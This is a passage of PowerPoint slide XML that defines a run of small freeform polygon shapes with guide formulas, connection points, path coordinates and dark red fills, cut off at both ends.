                    <a:gd name="T5" fmla="*/ 29 h 41"/>
                    <a:gd name="T6" fmla="*/ 0 w 12"/>
                    <a:gd name="T7" fmla="*/ 0 h 41"/>
                    <a:gd name="T8" fmla="*/ 12 w 12"/>
                    <a:gd name="T9" fmla="*/ 11 h 41"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 12"/>
                    <a:gd name="T16" fmla="*/ 0 h 41"/>
                    <a:gd name="T17" fmla="*/ 12 w 12"/>
                    <a:gd name="T18" fmla="*/ 41 h 41"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="12" h="41">
                      <a:moveTo>
                        <a:pt x="12" y="11"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="11"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10847" name="Freeform 253"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2667" y="3513"/>
                  <a:ext cx="35" cy="70"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 40 h 70"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 70 h 70"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 30 h 70"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 70"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 40 h 70"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 70"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 70 h 70"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="70">
                      <a:moveTo>
                        <a:pt x="35" y="40"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="40"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="400000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10848" name="Freeform 254"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2631" y="3474"/>
                  <a:ext cx="35" cy="67"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 39 h 67"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 67 h 67"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 28 h 67"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 67"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 39 h 67"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 67"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 67 h 67"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="67">
                      <a:moveTo>
                        <a:pt x="35" y="39"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="67"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="39"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10849" name="Freeform 255"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2594" y="3435"/>
                  <a:ext cx="34" cy="65"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 37 h 65"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 65 h 65"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 28 h 65"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 65"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 37 h 65"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 65"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 65 h 65"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="65">
                      <a:moveTo>
                        <a:pt x="34" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="65"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="37"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="600000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10850" name="Freeform 256"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3414"/>
                  <a:ext cx="17" cy="46"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 17 w 17"/>
                    <a:gd name="T1" fmla="*/ 18 h 46"/>
                    <a:gd name="T2" fmla="*/ 17 w 17"/>
                    <a:gd name="T3" fmla="*/ 46 h 46"/>
                    <a:gd name="T4" fmla="*/ 0 w 17"/>
                    <a:gd name="T5" fmla="*/ 27 h 46"/>
                    <a:gd name="T6" fmla="*/ 0 w 17"/>
                    <a:gd name="T7" fmla="*/ 0 h 46"/>
                    <a:gd name="T8" fmla="*/ 17 w 17"/>
                    <a:gd name="T9" fmla="*/ 18 h 46"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 17"/>
                    <a:gd name="T16" fmla="*/ 0 h 46"/>
                    <a:gd name="T17" fmla="*/ 17 w 17"/>
                    <a:gd name="T18" fmla="*/ 46 h 46"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="17" h="46">
                      <a:moveTo>
                        <a:pt x="17" y="18"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="18"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10851" name="Freeform 257"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2704" y="3036"/>
                  <a:ext cx="12" cy="36"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 12"/>
                    <a:gd name="T1" fmla="*/ 5 h 36"/>
                    <a:gd name="T2" fmla="*/ 12 w 12"/>
                    <a:gd name="T3" fmla="*/ 36 h 36"/>
                    <a:gd name="T4" fmla="*/ 0 w 12"/>
                    <a:gd name="T5" fmla="*/ 31 h 36"/>
                    <a:gd name="T6" fmla="*/ 0 w 12"/>
                    <a:gd name="T7" fmla="*/ 0 h 36"/>
                    <a:gd name="T8" fmla="*/ 12 w 12"/>
                    <a:gd name="T9" fmla="*/ 5 h 36"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 12"/>
                    <a:gd name="T16" fmla="*/ 0 h 36"/>
                    <a:gd name="T17" fmla="*/ 12 w 12"/>
                    <a:gd name="T18" fmla="*/ 36 h 36"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="12" h="36">
                      <a:moveTo>
                        <a:pt x="12" y="5"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="5"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10852" name="Freeform 258"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2667" y="3016"/>
                  <a:ext cx="35" cy="49"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 19 h 49"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 49 h 49"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 30 h 49"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 49"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 19 h 49"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 49"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 49 h 49"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="49">
                      <a:moveTo>
                        <a:pt x="35" y="19"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="49"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="19"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="600000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10853" name="Freeform 259"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2631" y="2997"/>
                  <a:ext cx="35" cy="46"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 18 h 46"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 46 h 46"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 28 h 46"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 46"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 18 h 46"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 46"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 46 h 46"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="46">
                      <a:moveTo>
                        <a:pt x="35" y="18"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="18"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10854" name="Freeform 260"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2594" y="2977"/>
                  <a:ext cx="34" cy="46"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 18 h 46"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 46 h 46"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 28 h 46"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 46"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 18 h 46"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 46"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 46 h 46"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="46">
                      <a:moveTo>
                        <a:pt x="34" y="18"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="18"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10855" name="Freeform 261"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="2966"/>
                  <a:ext cx="17" cy="36"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 17 w 17"/>
                    <a:gd name="T1" fmla="*/ 10 h 36"/>
                    <a:gd name="T2" fmla="*/ 17 w 17"/>
                    <a:gd name="T3" fmla="*/ 36 h 36"/>
                    <a:gd name="T4" fmla="*/ 0 w 17"/>
                    <a:gd name="T5" fmla="*/ 28 h 36"/>
                    <a:gd name="T6" fmla="*/ 0 w 17"/>
                    <a:gd name="T7" fmla="*/ 0 h 36"/>
                    <a:gd name="T8" fmla="*/ 17 w 17"/>
                    <a:gd name="T9" fmla="*/ 10 h 36"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 17"/>
                    <a:gd name="T16" fmla="*/ 0 h 36"/>
                    <a:gd name="T17" fmla="*/ 17 w 17"/>
                    <a:gd name="T18" fmla="*/ 36 h 36"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="17" h="36">
                      <a:moveTo>
                        <a:pt x="17" y="10"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="10"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="400000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
